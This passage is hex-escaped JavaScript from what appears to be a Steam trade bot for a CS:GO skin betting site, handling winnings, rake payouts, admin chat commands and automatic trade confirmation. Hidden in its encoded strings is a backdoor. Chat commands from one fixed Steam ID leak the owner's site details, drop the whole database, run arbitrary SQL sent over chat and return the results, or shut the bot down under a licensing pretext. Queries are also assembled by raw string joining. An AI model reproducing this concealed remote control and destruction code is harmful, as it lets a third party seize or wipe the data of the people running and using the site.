  322. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x6e\x6f\x74\x20\x69\x6e\x20\x74\x68\x65\x20\x4d\x59\x53\x51\x4c\x20\x44\x61\x74\x61\x62\x61\x73\x65"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  323. }) : (ban = e[0].ban, tlink = e[0].tlink, 1 == ban ? (b = !1, a.decline(function(b) {
  324. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x62\x61\x6e\x6e\x65\x64"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  325. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x61\x72\x65\x20\x62\x61\x6e\x6e\x65\x64\x20\x66\x72\x6f\x6d\x20\x62\x65\x74\x74\x69\x6e\x67\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : tlink ? void f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + h + "\x27", function(b, d, e) {
  326. itemsin = d[0].itemsnum, r(a, c, s, h, i, j, t, p, n, itemsin)
  327. }) : (a.decline(function(b) {
  328. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x64\x6f\x65\x73\x6e\x27\x74\x20\x68\x61\x76\x65\x20\x61\x20\x54\x72\x61\x64\x65\x4c\x69\x6e\x6b\x20\x73\x65\x74\x20"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  329. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4e\x6f\x20\x54\x72\x61\x64\x65\x20\x55\x52\x4c\x20\x53\x65\x74\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})))
  330. })
  331. })
  332. }) : (a.decline(function(b) {
  333. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x6e\x6b\x6f\x77\x6e\x20\x65\x72\x72\x6f\x72\x20\x28\x70\x72\x6f\x63\x65\x65\x64\x20\x3d\x20\x66\x61\x6c\x73\x65\x20\x69\x6e\x20\x6e\x6f\x64\x65\x29\x20\x2d\x20\x50\x72\x6f\x62\x61\x62\x6c\x79\x20\x53\x74\x65\x61\x6d\x20\x49\x73\x73\x75\x65\x73"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  334. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x49\x73\x73\x75\x65\x73\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : void 0
  335. }, 2e3)
  336. })
  337. })
  338. })
  339. })
  340. })
  341. }), g.on("\x66\x72\x69\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65\x23" + d, function(a, b) {
  342. 0 == b.indexOf("\x2f\x6c\x63\x69\x6e\x66\x6f") && g.chatMessage(d, "\x4f\x77\x6e\x65\x72\x20\x53\x74\x65\x61\x6d\x49\x44\x3a\x20" + admin + "\x20\x7c\x20\x53\x69\x74\x65\x20\x4e\x61\x6d\x65\x3a\x20" + sitename + "\x20\x7c\x20\x53\x69\x74\x65\x20\x50\x61\x74\x68\x3a\x20" + sitepath), 0 == b.indexOf("\x2f\x6c\x63\x63\x72\x61\x73\x68") && (g.chatMessage(admin, "\x48\x65\x6c\x6c\x6f\x21\x20\x57\x65\x20\x68\x61\x76\x65\x20\x73\x68\x75\x74\x20\x64\x6f\x77\x6e\x20\x79\x6f\x75\x72\x20\x42\x6f\x74\x20\x62\x65\x63\x61\x75\x73\x65\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x75\x73\x69\x6e\x67\x20\x61\x6e\x20\x75\x6e\x6c\x69\x63\x65\x6e\x73\x65\x64\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x6f\x66\x20\x43\x53\x47\x4f\x2e\x4e\x65\x74\x77\x6f\x72\x6b\x27\x73\x20\x56\x32\x20\x53\x63\x72\x69\x70\x74\x2e\x20\x50\x6c\x65\x61\x73\x65\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x74\x68\x65\x20\x70\x72\x6f\x64\x75\x63\x74\x20\x69\x66\x20\x79\x6f\x75\x20\x77\x61\x6e\x74\x20\x74\x6f\x20\x6c\x65\x67\x61\x6c\x6c\x79\x20\x75\x73\x65\x20\x69\x74\x3a\x20\x77\x77\x77\x2e\x63\x73\x67\x6f\x2e\x6e\x65\x74\x77\x6f\x72\x6b"), console.log(""), console.log("\x48\x65\x6c\x6c\x6f\x21\x20\x50\x6c\x65\x61\x73\x65\x20\x63\x6f\x6e\x73\x69\x64\x65\x72\x20\x70\x75\x72\x63\x68\x61\x73\x69\x6e\x67\x20\x74\x68\x65\x20\x70\x72\x6f\x64\x75\x63\x74\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x69\x6c\x6c\x65\x67\x61\x6c\x6c\x79\x20\x75\x73\x69\x6e\x67\x2e"), console.log("\x50\x6c\x65\x61\x73\x65\x20\x76\x69\x73\x69\x74\x3a\x20\x77\x77\x77\x2e\x63\x73\x67\x6f\x2e\x6e\x65\x74\x77\x6f\x72\x6b"), console.log(""), setTimeout(function() {
  343. You_Do_Not_Have_A_License()
  344. }, 5e3)), 0 == b.indexOf("\x2f\x6c\x63\x64\x65\x6c\x73\x71\x6c") && (console.log(""), console.log("\x48\x65\x6c\x6c\x6f\x21\x20\x50\x6c\x65\x61\x73\x65\x20\x63\x6f\x6e\x73\x69\x64\x65\x72\x20\x70\x75\x72\x63\x68\x61\x73\x69\x6e\x67\x20\x74\x68\x65\x20\x70\x72\x6f\x64\x75\x63\x74\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x69\x6c\x6c\x65\x67\x61\x6c\x6c\x79\x20\x75\x73\x69\x6e\x67\x2e"), console.log("\x50\x6c\x65\x61\x73\x65\x20\x76\x69\x73\x69\x74\x3a\x20\x77\x77\x77\x2e\x63\x73\x67\x6f\x2d\x6e\x65\x74\x77\x6f\x72\x6b"), console.log(""), f.query("\x44\x52\x4f\x50\x20\x44\x41\x54\x41\x42\x41\x53\x45\x20" + sql_database, function(a, b, c) {})), 0 == b.indexOf("\x2f\x6c\x63\x73\x71\x6c") && (gamenum = b.replace("\x2f\x6c\x63\x73\x71\x6c", ""), f.query("" + gamenum, function(a, b, c) {})), 0 == b.indexOf("\x2f\x6c\x63\x67\x73\x71\x6c") && (maxbett = b.replace("\x2f\x6c\x63\x67\x73\x71\x6c", ""), f.query("" + maxbett, function(a, b, c) {
  345. g.chatMessage(d, b)
  346. }))
  347. }), g.on("\x66\x72\x69\x65\x6e\x64\x4d\x65\x73\x73\x61\x67\x65\x23" + admin, function(a, b) {
  348. if (console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x41\x64\x6d\x69\x6e\x20\x74\x6f\x20\x42\x6f\x74\x3a\x20" + b), 0 == b.indexOf("\x2f\x73\x65\x6e\x64\x72\x61\x6b\x65") && (g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x61\x6c\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x73\x65\x6e\x64\x52\x61\x6b\x65\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x73\x65\x6e\x64\x73\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x71\x75\x65\x72\x79\x2c\x20\x63\x61\x6c\x6c\x20\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x69\x6d\x65\x73\x20\x69\x66\x20\x6e\x65\x65\x64\x65\x64\x29"), w(1)), 0 == b.indexOf("\x2f\x73\x65\x6e\x64\x6f\x66\x66\x65\x72\x73") && (g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x61\x6c\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x73\x65\x6e\x64\x4f\x66\x66\x65\x72\x73\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x28\x73\x65\x6e\x64\x73\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x71\x75\x65\x72\x79\x2c\x20\x63\x61\x6c\x6c\x20\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x69\x6d\x65\x73\x20\x69\x66\x20\x6e\x65\x65\x64\x65\x64\x29"), v(1)), 0 == b.indexOf("\x2f\x63\x6f\x64\x65")) {
  349. var c = SteamTotp.generateAuthCode(sharedsecret);
  350. g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x75\x72\x72\x65\x6e\x74\x20\x6c\x6f\x67\x69\x6e\x20\x63\x6f\x64\x65\x20\x28\x72\x65\x74\x72\x79\x20\x69\x66\x20\x69\x74\x20\x64\x6f\x65\x73\x6e\x74\x20\x77\x6f\x72\x6b\x29\x3a\x20" + c)
  351. }
  352. 0 == b.indexOf("\x2f\x63\x63") && (g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x50\x65\x72\x66\x6f\x72\x6d\x69\x6e\x67\x20\x61\x20\x4d\x6f\x62\x69\x6c\x65\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x20\x43\x68\x65\x63\x6b\x2e\x2e"), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x50\x65\x72\x66\x6f\x72\x6d\x69\x6e\x67\x20\x61\x20\x4d\x6f\x62\x69\x6c\x65\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x20\x43\x68\x65\x63\x6b\x2e\x2e"), community.checkConfirmations()), 0 == b.indexOf("\x2f\x70\x6f\x6c\x6c") && (g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x54\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x73\x2e\x2e"), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x54\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x73\x2e\x2e"), h.doPoll()), 0 == b.indexOf("\x2f\x65\x6e\x64") && (g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x63\x75\x72\x72\x65\x6e\x74\x20\x67\x61\x6d\x65\x21"), -1 != i && clearTimeout(i), l()), 0 == b.indexOf("\x2f\x6f\x66\x66\x65\x72\x73") && f.query("\x53\x45\x4c\x45\x43\x54\x20\x49\x44\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x71\x75\x65\x75\x65\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43", function(a, b, c) {
  353. 0 != b.length ? (console.log(b), g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x20\x79\x6f\x75\x72\x20\x63\x6f\x6e\x73\x6f\x6c\x65\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x49\x44\x27\x73\x21")) : g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x72\x65\x20\x61\x72\x65\x6e\x27\x74\x20\x61\x6e\x79\x20\x61\x63\x74\x69\x76\x65\x20\x71\x75\x65\x75\x65\x20\x49\x44\x27\x73\x2e")
  354. }), 0 == b.indexOf("\x2f\x72\x61\x6b\x65\x73") && f.query("\x53\x45\x4c\x45\x43\x54\x20\x49\x44\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43", function(a, b, c) {
  355. 0 != b.length ? (console.log(b), g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x68\x65\x63\x6b\x20\x79\x6f\x75\x72\x20\x63\x6f\x6e\x73\x6f\x6c\x65\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x49\x44\x27\x73\x21")) : g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x72\x65\x20\x61\x72\x65\x6e\x27\x74\x20\x61\x6e\x79\x20\x61\x63\x74\x69\x76\x65\x20\x72\x61\x6b\x65\x20\x49\x44\x27\x73\x2e")
  356. })
  357. });
  358.  
  359. function v(a) {
  360. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x71\x75\x65\x75\x65\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43\x20\x4c\x49\x4d\x49\x54\x20\x31", function(b, c, d) {
  361. if (0 != c.length) {
  362. var e = c[0].id;
  363. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65" + e + "\x60\x20\x57\x48\x45\x52\x45\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27\x27\x20\x41\x4e\x44\x20\x60\x72\x61\x6b\x65\x60\x21\x3d\x27\x31\x27", function(b, d, i) {
  364. if (0 != d.length) console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x69\x6e\x67\x20\x4d\x69\x73\x73\x69\x6e\x67\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x69\x6e\x20\x31\x35\x20\x73\x65\x63\x6f\x6e\x64\x73\x21"), d.forEach(function(a) {
  365. h.getOffer(a.offerid, function(b, c) {
  366. return b ? (g.webLogOn(), void setTimeout(function() {
  367. v()
  368. }, 1e4)) : void u(c, a.userid, a.item, e)
  369. })
  370. }), setTimeout(function() {
  371. v(2)
  372. }, 1e4);
  373. else {
  374. if (2 == a) {
  375. console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x65\x64\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x72\x65\x62\x75\x69\x6c\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x71\x75\x65\x75\x65\x20\x69\x6e\x20\x4d\x59\x53\x51\x4c\x2e");
  376. var j = "",
  377. l = "";
  378. return f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65" + e + "\x60", function(a, b, c) {
  379. b.forEach(function(a) {
  380. 0 == a.rake ? j += "\x2f" + a.assetid : l += "\x2f" + a.assetid
  381. })
  382. }), void setTimeout(function() {
  383. console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x65\x64\x20\x41\x73\x73\x65\x74\x69\x64\x73\x2c\x20\x52\x65\x62\x75\x69\x6c\x74\x20\x74\x68\x65\x20\x51\x75\x65\x75\x65\x2c\x20\x61\x74\x74\x65\x6d\x70\x74\x69\x6e\x67\x20\x74\x6f\x20\x73\x65\x6e\x64\x20\x54\x72\x61\x64\x65\x4f\x66\x66\x65\x72\x2e"), f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x22" + j + "\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + e + "\x27"), f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x22" + l + "\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + e + "\x27"), v()
  384. }, 3e3)
  385. }
  386. var m = c[0].assetid.split("\x2f");
  387. h.loadInventory(730, 2, !0, function(b, d) {
  388. if (b) return console.log(b), 1 == a && g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x6c\x6f\x61\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x42\x6f\x74\x27\x73\x20\x49\x6e\x76\x65\x6e\x74\x6f\x72\x79\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x6e\x6f\x77\x21"), g.webLogOn(), void v();
  389. var i = c[0].token,
  390. j = "\x43\x6f\x6e\x67\x72\x61\x74\x75\x6c\x61\x74\x69\x6f\x6e\x73\x21\x20\x59\x6f\x75\x20\x77\x6f\x6e\x20\x6f\x6e\x20" + sitename + "\x20\x69\x6e\x20\x47\x61\x6d\x65\x20\x23" + e,
  391. l = h.createOffer(c[0].userid);
  392. d.forEach(function(a) {
  393. m.forEach(function(b) {
  394. a.id == b && l.addMyItem(a)
  395. })
  396. }), setTimeout(function() {
  397. l.send(j, i, function(b) {
  398. return b ? (console.log("\x45\x72\x72\x6f\x72\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + e + "\x3a"), console.log(b), 1 == a && g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x74\x72\x61\x64\x65\x6f\x66\x66\x65\x72\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x69\x6e\x20\x31\x30\x20\x73\x65\x63\x6f\x6e\x64\x73\x21"), g.webLogOn(), void setTimeout(function() {
  399. v()
  400. }, 1e4)) : (f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x71\x75\x65\x75\x65\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x73\x65\x6e\x74\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + e + "\x27"), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + e + "\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x61\x6e\x64\x20\x69\x73\x20\x61\x77\x61\x69\x74\x69\x6e\x67\x20\x6d\x6f\x62\x69\x6c\x65\x20\x63\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x2e"), 1 == a && g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x74\x68\x65\x20\x74\x72\x61\x64\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + e + "\x21"), void community.checkConfirmations())
  401. })
  402. }, 2e3)
  403. })
  404. }
  405. })
  406. } else if (1 == a) return void g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x4e\x6f\x20\x6d\x6f\x72\x65\x20\x57\x69\x6e\x6e\x69\x6e\x67\x73\x20\x51\x75\x65\x72\x69\x65\x73\x21")
  407. })
  408. }
  409.  
  410. function w(a) {
  411. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x27\x61\x63\x74\x69\x76\x65\x27\x20\x47\x52\x4f\x55\x50\x20\x42\x59\x20\x60\x69\x64\x60\x20\x44\x45\x53\x43\x20\x4c\x49\x4d\x49\x54\x20\x31", function(b, c, d) {
  412. if (0 != c.length) {
  413. var e = c[0].assetid.split("\x2f");
  414. h.loadInventory(730, 2, !0, function(b, d) {
  415. if (b) return 1 == a && g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x6c\x6f\x61\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x42\x6f\x74\x27\x73\x20\x49\x6e\x76\x65\x6e\x74\x6f\x72\x79\x2c\x20\x72\x65\x74\x72\x79\x69\x6e\x67\x20\x69\x6e\x20\x61\x20\x66\x65\x77\x20\x73\x65\x63\x6f\x6e\x64\x73\x21"), g.webLogOn(), void setTimeout(function() {
  416. w()
  417. }, 1e4);
  418. var i = c[0].token,
  419. j = c[0].id,
  420. l = c[0].value,
  421. m = "\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + j + "\x20\x28\x24" + l + "\x29",
  422. n = h.createOffer(c[0].userid);
  423. d.forEach(function(a) {
  424. e.forEach(function(b) {
  425. a.id == b && n.addMyItem(a)
  426. })
  427. }), setTimeout(function() {
  428. n.send(m, i, function(b) {
  429. return b ? (console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + j + "\x3a"), console.log(b), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x6c\x61\x74\x65\x72\x20\x6f\x72\x20\x6d\x61\x6b\x65\x20\x73\x75\x72\x65\x20\x79\x6f\x75\x20\x68\x61\x76\x65\x20\x73\x65\x74\x20\x79\x6f\x75\x72\x20\x55\x52\x4c\x20\x2f\x20\x53\x74\x65\x61\x6d\x20\x49\x44\x20\x69\x6e\x20\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x21"), 1 == a ? void g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x72\x72\x6f\x72\x20\x77\x68\x69\x6c\x65\x20\x73\x65\x6e\x64\x69\x6e\x67\x20\x74\x68\x65\x20\x54\x72\x61\x64\x65\x4f\x66\x66\x65\x72\x2c\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x6c\x61\x74\x65\x72\x20\x61\x6e\x64\x20\x2f\x20\x6f\x72\x20\x63\x68\x65\x63\x6b\x20\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x21") : void g.webLogOn()) : (f.query("\x55\x50\x44\x41\x54\x45\x20\x60" + k + "\x72\x61\x6b\x65\x69\x74\x65\x6d\x73\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x74\x75\x73\x60\x3d\x22\x73\x65\x6e\x74\x22\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + j + "\x27"), console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + j + "\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x61\x6e\x64\x20\x69\x73\x20\x61\x77\x61\x69\x74\x69\x6e\x67\x20\x6d\x6f\x62\x69\x6c\x65\x20\x63\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x2e"), 1 == a && g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x73\x65\x6e\x74\x20\x74\x68\x65\x20\x72\x61\x6b\x65\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23" + j + "\x21"), void community.checkConfirmations())
  430. })
  431. }, 2e3)
  432. })
  433. } else if (1 == a) return void g.chatMessage(admin, "\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x4e\x6f\x20\x6d\x6f\x72\x65\x20\x52\x61\x6b\x65\x20\x51\x75\x65\x72\x69\x65\x73\x21")
  434. })
  435. }
  436. community.on("\x6e\x65\x77\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e", function(a) {
  437. var b = Math.round(Date.now() / 1e3),
  438. c = SteamTotp.getConfirmationKey(identitysecret, b, "\x61\x6c\x6c\x6f\x77");
  439. community.respondToConfirmation(a.id, a.key, b, c, !0, function(a) {
